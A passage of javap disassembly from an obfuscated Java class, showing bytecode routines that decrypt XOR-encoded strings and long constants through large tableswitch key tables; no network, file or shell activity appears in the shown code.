       190: swap
       191: iconst_0
       192: istore        14
       194: swap
       195: dup_x1
       196: iconst_1
       197: if_icmpgt     296
       200: dup
       201: iload         14
       203: dup2
       204: caload
       205: iload         14
       207: bipush        7
       209: irem
       210: tableswitch   { // 0 to 5
                       0: 248
                       1: 253
                       2: 258
                       3: 263
                       4: 268
                       5: 273
                 default: 278
            }
       248: bipush        106
       250: goto          280
       253: bipush        8
       255: goto          280
       258: bipush        85
       260: goto          280
       263: bipush        50
       265: goto          280
       268: bipush        17
       270: goto          280
       273: bipush        86
       275: goto          280
       278: bipush        72
       280: ixor
       281: i2c
       282: castore
       283: iinc          14, 1
       286: swap
       287: dup_x1
       288: ifne          296
       291: dup2
       292: swap
       293: goto          203
       296: swap
       297: dup_x1
       298: iload         14
       300: if_icmpgt     200
       303: new           #110                // class java/lang/String
       306: dup_x1
       307: swap
       308: invokespecial #183                // Method java/lang/String."<init>":([C)V
       311: invokevirtual #85                 // Method java/lang/String.intern:()Ljava/lang/String;
       314: swap
       315: pop
       316: swap
       317: tableswitch   { // 0 to 0
                       0: 120
                 default: 50
            }
       336: iconst_3
       337: newarray       long
       339: astore        4
       341: iconst_0
       342: istore_1
       343: ldc           #20                 // String d^D¼ 6\u0096=\u007fqG\u001eL%¤K\u001e\u0003Üt®±\u009d7
       345: dup
       346: astore_2
       347: invokevirtual #185                // Method java/lang/String.length:()I
       350: istore_3
       351: iconst_0
       352: istore_0
       353: aload_2
       354: iload_0
       355: iinc          0, 8
       358: iload_0
       359: invokevirtual #271                // Method java/lang/String.substring:(II)Ljava/lang/String;
       362: ldc           #21                 // String ISO-8859-1
       364: invokevirtual #341                // Method java/lang/String.getBytes:(Ljava/lang/String;)[B
       367: astore        5
       369: aload         4
       371: iload_1
       372: iinc          1, 1
       375: aload         5
       377: iconst_0
       378: baload
       379: i2l
       380: ldc2_w        #381                // long 255l
       383: land
       384: bipush        56
       386: lshl
       387: aload         5
       389: iconst_1
       390: baload
       391: i2l
       392: ldc2_w        #381                // long 255l
       395: land
       396: bipush        48
       398: lshl
       399: lor
       400: aload         5
       402: iconst_2
       403: baload
       404: i2l
       405: ldc2_w        #381                // long 255l
       408: land
       409: bipush        40
       411: lshl
       412: lor
       413: aload         5
       415: iconst_3
       416: baload
       417: i2l
       418: ldc2_w        #381                // long 255l
       421: land
       422: bipush        32
       424: lshl
       425: lor
       426: aload         5
       428: iconst_4
       429: baload
       430: i2l
       431: ldc2_w        #381                // long 255l
       434: land
       435: bipush        24
       437: lshl
       438: lor
       439: aload         5
       441: iconst_5
       442: baload
       443: i2l
       444: ldc2_w        #381                // long 255l
       447: land
       448: bipush        16
       450: lshl
       451: lor
       452: aload         5
       454: bipush        6
       456: baload
       457: i2l
       458: ldc2_w        #381                // long 255l
       461: land
       462: bipush        8
       464: lshl
       465: lor
       466: aload         5
       468: bipush        7
       470: baload
       471: i2l
       472: ldc2_w        #381                // long 255l
       475: land
       476: lor
       477: iconst_m1
       478: goto          502
       481: lastore
       482: iload_0
       483: iload_3
       484: if_icmplt     353
       487: aload         4
       489: putstatic     #161                // Field c:[J
       492: iconst_3
       493: anewarray     #173                // class java/lang/Long
       496: putstatic     #201                // Field d:[Ljava/lang/Long;
       499: goto          513
       502: dup_x2
       503: pop
       504: lload         6
       506: lxor
       507: dup2_x1
       508: pop2
       509: pop
       510: goto          481
       513: return

  private static java.lang.String a(int, int, int);
    Code:
         0: iload_0
         1: iload_2
         2: ixor
         3: sipush        -8009
         6: ixor
         7: ldc           #8                  // int 65535
         9: iand
        10: istore_3
        11: getstatic     #71                 // Field b:[Ljava/lang/String;
        14: iload_3
        15: aaload
        16: ifnonnull     2627
        19: getstatic     #73                 // Field a:[Ljava/lang/String;
        22: iload_3
        23: aaload
        24: invokevirtual #330                // Method java/lang/String.toCharArray:()[C
        27: astore        4
        29: aload         4
        31: iconst_0
        32: caload
        33: sipush        255
        36: iand
        37: tableswitch   { // 0 to 254
                       0: 1072
                       1: 1077
                       2: 1082
                       3: 1088
                       4: 1094
                       5: 1100
                       6: 1105
                       7: 1110
                       8: 1115
                       9: 1120
                      10: 1125
                      11: 1131
                      12: 1137
                      13: 1142
                      14: 1148
                      15: 1154
                      16: 1160
                      17: 1165
                      18: 1171
                      19: 1177
                      20: 1183
                      21: 1189
                      22: 1194
                      23: 1200
                      24: 1205
                      25: 1210
                      26: 1216
                      27: 1221
                      28: 1227
                      29: 1233
                      30: 1238
                      31: 1244
                      32: 1250
                      33: 1256
                      34: 1262
                      35: 1268
                      36: 1274
                      37: 1280
                      38: 1285
                      39: 1291
                      40: 1296
                      41: 1301
                      42: 1306
                      43: 1312
                      44: 1318
                      45: 1324
                      46: 1329
                      47: 1335
                      48: 1339
                      49: 1344
                      50: 1350
                      51: 1356
                      52: 1361
                      53: 1367
                      54: 1373
                      55: 1379
                      56: 1385
                      57: 1390
                      58: 1395
                      59: 1400
                      60: 1405
                      61: 1411
                      62: 1416
                      63: 1422
                      64: 1426
                      65: 1431
                      66: 1436
                      67: 1442
                      68: 1447
                      69: 1452
                      70: 1458
                      71: 1464
                      72: 1469
                      73: 1474
                      74: 1479
                      75: 1485
                      76: 1491
                      77: 1497
                      78: 1503
                      79: 1508
                      80: 1514
                      81: 1519
                      82: 1525
                      83: 1530
                      84: 1536
                      85: 1542
                      86: 1548
                      87: 1553
                      88: 1558
                      89: 1563
                      90: 1569
                      91: 1575
                      92: 1581
                      93: 1586
                      94: 1591
                      95: 1597
                      96: 1602
                      97: 1608
                      98: 1614
                      99: 1620
                     100: 1625
                     101: 1630
                     102: 1635
                     103: 1640
                     104: 1646
                     105: 1652
                     106: 1657
                     107: 1663
                     108: 1669
                     109: 1674
                     110: 1679
                     111: 1685
                     112: 1691
                     113: 1697
                     114: 1703
                     115: 1709
                     116: 1713
                     117: 1719
                     118: 1724
                     119: 1730
                     120: 1735
                     121: 1741
                     122: 1746
                     123: 1751
                     124: 1756
                     125: 1762
                     126: 1767
                     127: 1773
                     128: 1777
                     129: 1783
                     130: 1788
                     131: 1793
                     132: 1799
                     133: 1805
                     134: 1811
                     135: 1816
                     136: 1821
                     137: 1827
                     138: 1832
                     139: 1837
                     140: 1843
                     141: 1848
                     142: 1854
                     143: 1859
                     144: 1865
                     145: 1871
                     146: 1877
                     147: 1882
                     148: 1888
                     149: 1894
                     150: 1899
                     151: 1904
                     152: 1908
                     153: 1914
                     154: 1919
                     155: 1925
                     156: 1930
                     157: 1935
                     158: 1940
                     159: 1945
                     160: 1950
                     161: 1956
                     162: 1961
                     163: 1967
                     164: 1972
                     165: 1978
                     166: 1984
                     167: 1989
                     168: 1995
                     169: 2001
                     170: 2006
                     171: 2012
                     172: 2018
                     173: 2024
                     174: 2029
                     175: 2035
                     176: 2040
                     177: 2045
                     178: 2050
                     179: 2055
                     180: 2060
                     181: 2066
                     182: 2071
                     183: 2077
                     184: 2082
                     185: 2087
                     186: 2092
                     187: 2097
                     188: 2102
                     189: 2108
                     190: 2114
                     191: 2120
                     192: 2126
                     193: 2132
                     194: 2138
                     195: 2143
                     196: 2149
                     197: 2155
                     198: 2161
                     199: 2166
                     200: 2171
                     201: 2177
                     202: 2181
                     203: 2186
                     204: 2191
                     205: 2196
                     206: 2201
                     207: 2206
                     208: 2211
                     209: 2216
                     210: 2221
                     211: 2226
                     212: 2232
                     213: 2237
                     214: 2242
                     215: 2248
                     216: 2254
                     217: 2260
                     218: 2265
                     219: 2271
                     220: 2277
                     221: 2283
                     222: 2288
                     223: 2294
                     224: 2299
                     225: 2304
                     226: 2310
                     227: 2316
                     228: 2321
                     229: 2326
                     230: 2332
                     231: 2337
                     232: 2343
                     233: 2348
                     234: 2354
                     235: 2359
                     236: 2364
                     237: 2370
                     238: 2375
                     239: 2380
                     240: 2386
                     241: 2392
                     242: 2398
                     243: 2403
                     244: 2409
                     245: 2414
                     246: 2420
                     247: 2426
                     248: 2431
                     249: 2436
                     250: 2441
                     251: 2447
                     252: 2453
                     253: 2458
                     254: 2463
                 default: 2469
            }
      1072: bipush        19
      1074: goto          2471
      1077: bipush        59
      1079: goto          2471
      1082: sipush        132
      1085: goto          2471
      1088: sipush        185
      1091: goto          2471
      1094: sipush        161
      1097: goto          2471
      1100: bipush        109
      1102: goto          2471
      1105: bipush        95
      1107: goto          2471
      1110: bipush        85
      1112: goto          2471
      1115: bipush        7
      1117: goto          2471
      1120: bipush        74
      1122: goto          2471
      1125: sipush        158
      1128: goto          2471
      1131: sipush        222
      1134: goto          2471
      1137: bipush        96
      1139: goto          2471
      1142: sipush        251
      1145: goto          2471
      1148: sipush        130
      1151: goto          2471
      1154: sipush        184
      1157: goto          2471
      1160: bipush        22
      1162: goto          2471
      1165: sipush        144
      1168: goto          2471
      1171: sipush        178
      1174: goto          2471
      1177: sipush        211
      1180: goto          2471
      1183: sipush        197
      1186: goto          2471
      1189: bipush        47
      1191: goto          2471
      1194: sipush        172
      1197: goto          2471
      1200: bipush        49
      1202: goto          2471
      1205: bipush        64
      1207: goto          2471
      1210: sipush        151
      1213: goto          2471
      1216: bipush        13
      1218: goto          2471
      1221: sipush        232
      1224: goto          2471
      1227: sipush        199
      1230: goto          2471
      1233: bipush        46
      1235: goto          2471
      1238: sipush        214
      1241: goto          2471
      1244: sipush        155
      1247: goto          2471
      1250: sipush        154
      1253: goto          2471
      1256: sipush        195
      1259: goto          2471
      1262: sipush        253
      1265: goto          2471
      1268: sipush        143
      1271: goto          2471
      1274: sipush        243
      1277: goto          2471
      1280: bipush        112
      1282: goto          2471
      1285: sipush        162
      1288: goto          2471
      1291: bipush        90
      1293: goto          2471
      1296: bipush        71
      1298: goto          2471
      1301: bipush        24
      1303: goto          2471
      1306: sipush        246
      1309: goto          2471
      1312: sipush        201
      1315: goto          2471
      1318: sipush        148
      1321: goto          2471
      1324: bipush        11
      1326: goto          2471
      1329: sipush        215
      1332: goto          2471
      1335: iconst_3
      1336: goto          2471
      1339: bipush        81
      1341: goto          2471
      1344: sipush        220
      1347: goto          2471
      1350: sipush        230
      1353: goto          2471
      1356: bipush        106
      1358: goto          2471
      1361: sipush        152
      1364: goto          2471
      1367: sipush        166
      1370: goto          2471
      1373: sipush        164
      1376: goto          2471
      1379: sipush        137
      1382: goto          2471
      1385: bipush        79
      1387: goto          2471
      1390: bipush        76
      1392: goto          2471
      1395: bipush        55
      1397: goto          2471
      1400: bipush        37
      1402: goto          2471
      1405: sipush        217
      1408: goto          2471
      1411: bipush        16
      1413: goto          2471
      1416: sipush        241
      1419: goto          2471
      1422: iconst_1
      1423: goto          2471
      1426: bipush        115
      1428: goto          2471
      1431: bipush        41
      1433: goto          2471
      1436: sipush        219
      1439: goto          2471
      1442: bipush        6
      1444: goto          2471
      1447: bipush        36
      1449: goto          2471
      1452: sipush        187
      1455: goto          2471
      1458: sipush        209
      1461: goto          2471
      1464: bipush        113
      1466: goto          2471
      1469: bipush        92
      1471: goto          2471
      1474: bipush        38
      1476: goto          2471
      1479: sipush        245
      1482: goto          2471
      1485: sipush        145
      1488: goto          2471
      1491: sipush        233
      1494: goto          2471
      1497: sipush        160
      1500: goto          2471
      1503: bipush        125
      1505: goto          2471
      1508: sipush        235
      1511: goto          2471
      1514: bipush        104
      1516: goto          2471
      1519: sipush        196
      1522: goto          2471
      1525: bipush        33
      1527: goto          2471
      1530: sipush        240
      1533: goto          2471
      1536: sipush        183
      1539: goto          2471
      1542: sipush        181
      1545: goto          2471
      1548: bipush        80
      1550: goto          2471
      1553: bipush        65
      1555: goto          2471
      1558: bipush        34
      1560: goto          2471
      1563: sipush        191
      1566: goto          2471
      1569: sipush        136
      1572: goto          2471
      1575: sipush        216
      1578: goto          2471
      1581: bipush        17
      1583: goto          2471
      1586: bipush        101
      1588: goto          2471
      1591: sipush        244
      1594: goto          2471
      1597: bipush        31
      1599: goto          2471
      1602: sipush        236
      1605: goto          2471
      1608: sipush        176
      1611: goto          2471
      1614: sipush        218
      1617: goto          2471
      1620: bipush        58
      1622: goto          2471
      1625: bipush        14
      1627: goto          2471
      1630: bipush        119
      1632: goto          2471
      1635: bipush        35
      1637: goto          2471
      1640: sipush        221
      1643: goto          2471
      1646: sipush        223
      1649: goto          2471
      1652: bipush        51
      1654: goto          2471
      1657: sipush        210
      1660: goto          2471
      1663: sipush        189
      1666: goto          2471
      1669: bipush        45
      1671: goto          2471
      1674: bipush        66
      1676: goto          2471
      1679: sipush        224
      1682: goto          2471
      1685: sipush        149
      1688: goto          2471
      1691: sipush        173
      1694: goto          2471
      1697: sipush        134
      1700: goto          2471
      1703: sipush        186
      1706: goto          2471
      1709: iconst_0
      1710: goto          2471
      1713: sipush        147
      1716: goto          2471
      1719: bipush        93
      1721: goto          2471
      1724: sipush        248
      1727: goto          2471
      1730: bipush        120
      1732: goto          2471
      1735: sipush        204
      1738: goto          2471
      1741: bipush        10
      1743: goto          2471
      1746: bipush        94
      1748: goto          2471
      1751: bipush        87
      1753: goto          2471
      1756: sipush        247
      1759: goto          2471
      1762: bipush        57
      1764: goto          2471
      1767: sipush        171
      1770: goto          2471
      1773: iconst_4
      1774: goto          2471
      1777: sipush        252
      1780: goto          2471
      1783: bipush        124
      1785: goto          2471
      1788: bipush        103
      1790: goto          2471
      1793: sipush        208
      1796: goto          2471
      1799: sipush        192
      1802: goto          2471
      1805: sipush        133
      1808: goto          2471
      1811: bipush        78
      1813: goto          2471
      1816: bipush        9
      1818: goto          2471
      1821: sipush        150
      1824: goto          2471
      1827: bipush        54
      1829: goto          2471
      1832: bipush        75
      1834: goto          2471
      1837: sipush        135
      1840: goto          2471
      1843: bipush        39
      1845: goto          2471
      1848: sipush        229
      1851: goto          2471
      1854: bipush        50
      1856: goto          2471
      1859: sipush        231
      1862: goto          2471
      1865: sipush        237
      1868: goto          2471
      1871: sipush        227
      1874: goto          2471
      1877: bipush        108
      1879: goto          2471
      1882: sipush        157
      1885: goto          2471
      1888: sipush        156
      1891: goto          2471
      1894: bipush        63
      1896: goto          2471
      1899: bipush        83
      1901: goto          2471
      1904: iconst_5
      1905: goto          2471
      1908: sipush        193
      1911: goto          2471
      1914: bipush        53
      1916: goto          2471
      1919: sipush        177
      1922: goto          2471
      1925: bipush        20
      1927: goto          2471
      1930: bipush        118
      1932: goto          2471
      1935: bipush        123
      1937: goto          2471
      1940: bipush        12
      1942: goto          2471
      1945: bipush        43
      1947: goto          2471
      1950: sipush        174
      1953: goto          2471
      1956: bipush        29
      1958: goto          2471
      1961: sipush        226
      1964: goto          2471
      1967: bipush        110
      1969: goto          2471
      1972: sipush        238
      1975: goto          2471
      1978: sipush        242
      1981: goto          2471
      1984: bipush        56
      1986: goto          2471
      1989: sipush        250
      1992: goto          2471
      1995: sipush        168
      1998: goto          2471
      2001: bipush        88
      2003: goto          2471
      2006: sipush        202
      2009: goto          2471
      2012: sipush        170
      2015: goto          2471
      2018: sipush        146
      2021: goto          2471
      2024: bipush        40
      2026: goto          2471
      2029: sipush        254
      2032: goto          2471
      2035: bipush        60
      2037: goto          2471
      2040: bipush        32
      2042: goto          2471
      2045: bipush        99
      2047: goto          2471
      2050: bipush        68
      2052: goto          2471
      2055: bipush        77
      2057: goto          2471
      2060: sipush        194
      2063: goto          2471
      2066: bipush        52
      2068: goto          2471
      2071: sipush        138
      2074: goto          2471
      2077: bipush        23
      2079: goto          2471
      2082: bipush        89
      2084: goto          2471
      2087: bipush        111
      2089: goto          2471
      2092: bipush        61
      2094: goto          2471
      2097: bipush        105
      2099: goto          2471
      2102: sipush        159
      2105: goto          2471
      2108: sipush        140
      2111: goto          2471
      2114: sipush        169
      2117: goto          2471
      2120: sipush        180
      2123: goto          2471
      2126: sipush        255
      2129: goto          2471
      2132: sipush        200
      2135: goto          2471
      2138: bipush        102
      2140: goto          2471
      2143: sipush        129
      2146: goto          2471
      2149: sipush        141
      2152: goto          2471
      2155: sipush        131
      2158: goto          2471
      2161: bipush        8
      2163: goto          2471
      2166: bipush        100
      2168: goto          2471
      2171: sipush        203
      2174: goto          2471
      2177: iconst_2
      2178: goto          2471
      2181: bipush        70
      2183: goto          2471
      2186: bipush        26
      2188: goto          2471
      2191: bipush        86
      2193: goto          2471
      2196: bipush        15
      2198: goto          2471
      2201: bipush        73
      2203: goto          2471
      2206: bipush        114
      2208: goto          2471
      2211: bipush        122
      2213: goto          2471
      2216: bipush        127
      2218: goto          2471
      2221: bipush        18
      2223: goto          2471
      2226: sipush        167
      2229: goto          2471
      2232: bipush        117
      2234: goto          2471
      2237: bipush        72
      2239: goto          2471
      2242: sipush        139
      2245: goto          2471
      2248: sipush        198
      2251: goto          2471
      2254: sipush        153
      2257: goto          2471
      2260: bipush        126
      2262: goto          2471
      2265: sipush        205
      2268: goto          2471
      2271: sipush        213
      2274: goto          2471
      2277: sipush        228
      2280: goto          2471
      2283: bipush        30
      2285: goto          2471
      2288: sipush        206
      2291: goto          2471
      2294: bipush        121
      2296: goto          2471
      2299: bipush        116
      2301: goto          2471
      2304: sipush        188
      2307: goto          2471
      2310: sipush        249
      2313: goto          2471
      2316: bipush        107
      2318: goto          2471
      2321: bipush        62
      2323: goto          2471
      2326: sipush        165
      2329: goto          2471
      2332: bipush        42
      2334: goto          2471
      2337: sipush        179
      2340: goto          2471
      2343: bipush        82
      2345: goto          2471
      2348: sipush        128
      2351: goto          2471
      2354: bipush        67
      2356: goto          2471
      2359: bipush        98
      2361: goto          2471
      2364: sipush        234
      2367: goto          2471
      2370: bipush        84
      2372: goto          2471
      2375: bipush        25
      2377: goto          2471
      2380: sipush        142
      2383: goto          2471
      2386: sipush        175
      2389: goto          2471
      2392: sipush        182
      2395: goto          2471
      2398: bipush        48
      2400: goto          2471
      2403: sipush        190
      2406: goto          2471
      2409: bipush        28
      2411: goto          2471
      2414: sipush        212
      2417: goto          2471
      2420: sipush        163
      2423: goto          2471
      2426: bipush        27
      2428: goto          2471
      2431: bipush        97
      2433: goto          2471
      2436: bipush        69
      2438: goto          2471
      2441: sipush        225
      2444: goto          2471
      2447: sipush        239
      2450: goto          2471
      2453: bipush        21
      2455: goto          2471
      2458: bipush        44
      2460: goto          2471
      2463: sipush        207
      2466: goto          2471
      2469: bipush        91
      2471: istore        5
      2473: iload_1
      2474: iload_2
      2475: ixor
      2476: dup
      2477: istore_1
      2478: sipush        255
      2481: iand
      2482: iload         5
      2484: isub
      2485: istore        6
      2487: iload         6
      2489: ifge          2498
      2492: iinc_w        6, 256
      2498: iload_1
      2499: ldc           #8                  // int 65535
      2501: iand
      2502: bipush        8
      2504: iushr
      2505: iload         5
      2507: isub
      2508: istore        7
      2510: iload         7
      2512: ifge          2521
      2515: iinc_w        7, 256
      2521: iconst_0
      2522: istore        8
      2524: goto          2602
      2527: iload         8
      2529: iconst_2
      2530: irem
      2531: istore        9
      2533: aload         4
      2535: iload         8
      2537: dup2
      2538: caload
      2539: iload         9
      2541: ifne          2573
      2544: iload         6
      2546: ixor
      2547: i2c
      2548: castore
      2549: iload         6
      2551: iconst_3
      2552: iushr
      2553: iload         6
      2555: iconst_5
      2556: ishl
      2557: ior
      2558: aload         4
      2560: iload         8
      2562: caload
      2563: ixor
      2564: sipush        255
      2567: iand
      2568: istore        6
      2570: goto          2599
      2573: iload         7
      2575: ixor
      2576: i2c
      2577: castore
      2578: iload         7
      2580: iconst_3
      2581: iushr
      2582: iload         7
      2584: iconst_5
      2585: ishl
      2586: ior
      2587: aload         4
      2589: iload         8
      2591: caload
      2592: ixor
      2593: sipush        255
      2596: iand
      2597: istore        7
      2599: iinc          8, 1
      2602: iload         8
      2604: aload         4
      2606: arraylength
      2607: if_icmplt     2527
      2610: getstatic     #71                 // Field b:[Ljava/lang/String;
      2613: iload_3
      2614: new           #110                // class java/lang/String
      2617: dup
      2618: aload         4
      2620: invokespecial #183                // Method java/lang/String."<init>":([C)V
      2623: invokevirtual #85                 // Method java/lang/String.intern:()Ljava/lang/String;
      2626: aastore
      2627: getstatic     #71                 // Field b:[Ljava/lang/String;
      2630: iload_3
      2631: aaload
      2632: areturn

  private static long a(int, long);
    Code:
         0: iload_0
         1: lload_1
         2: l2i
         3: ixor
         4: sipush        13736
         7: ixor
         8: sipush        32767
        11: iand
        12: istore_3
        13: getstatic     #201                // Field d:[Ljava/lang/Long;
        16: iload_3
        17: aaload
        18: ifnonnull     36
        21: getstatic     #201                // Field d:[Ljava/lang/Long;
        24: iload_3
        25: getstatic     #161                // Field c:[J
        28: iload_3
        29: laload
        30: lload_1
        31: lxor
        32: invokestatic  #287                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
        35: aastore
        36: getstatic     #201                // Field d:[Ljava/lang/Long;
        39: iload_3
        40: aaload
        41: invokevirtual #36                 // Method java/lang/Long.longValue:()J
        44: lreturn
}
